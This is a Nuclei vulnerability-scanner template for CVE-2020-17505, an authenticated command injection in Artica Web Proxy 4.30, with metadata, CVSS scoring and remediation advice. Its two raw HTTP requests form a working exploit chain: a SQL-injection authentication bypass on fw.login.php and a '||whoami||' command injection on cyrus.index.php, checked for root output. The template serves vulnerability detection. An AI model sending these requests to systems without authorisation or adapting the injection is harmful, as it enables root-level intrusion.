nuclei-templates/http/cves/2020/CVE-2020-17505.yaml

56 lines
2.2 KiB
YAML

id: CVE-2020-17505
info:
name: Artica Web Proxy 4.30 - OS Command Injection
author: dwisiswant0
severity: high
description: Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-17505
- https://blog.max0x4141.com/post/artica_proxy/
- https://github.com/sobinge/nuclei-templates
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-17505
cwe-id: CWE-78
epss-score: 0.96502
epss-percentile: 0.99502
cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: articatech
product: web_proxy
tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech
http:
- raw:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "array(2)"
- "Position: ||whoami||"
- "root"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204bd1705a9455e6871cb3419d303ccfad65755a7bdb6286bf4d77df2f8595aa2202200abf4f4c62097d8b13842832edda25d4bf39ef1baa841854228d08fc794f7316:922c64590222798bb761d5b6d8e72950